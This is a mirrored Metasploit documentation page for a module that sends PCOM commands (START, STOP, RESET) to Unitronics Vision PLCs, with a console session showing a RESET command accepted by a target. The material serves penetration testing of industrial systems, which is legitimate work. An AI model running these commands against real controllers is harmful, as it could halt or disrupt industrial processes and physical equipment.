CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/auxiliary/admin/scada/pcom_command.md
Views: 11784

Vulnerable Application

Unitronics Vision PLCs

Verification Steps

  1. Do: use auxiliary/admin/scada/pcom_command

  2. Do: set RHOST=IP where IP is the IP address of the target

  3. Do: run to send PCOM command

Scenarios

msf5 > use auxiliary/admin/scada/pcom_command msf5 auxiliary(admin/scada/pcom_command) > show options Module options (auxiliary/admin/scada/pcom_command): Name Current Setting Required Description ---- --------------- -------- ----------- MODE RESET yes PLC command (Accepted: START, STOP, RESET) RHOST yes The target address RPORT 20256 yes The target port (TCP) UNITID 0 no Unit ID (0 - 127) msf5 auxiliary(admin/scada/pcom_command) > set RHOST 192.168.1.1 RHOST => 192.168.1.1 msf5 auxiliary(admin/scada/pcom_command) > run [*] 192.168.1.1:20256 - Sending RESET command [*] 192.168.1.1:20256 - Command accepted [*] Auxiliary module execution completed msf5 auxiliary(admin/scada/pcom_command) >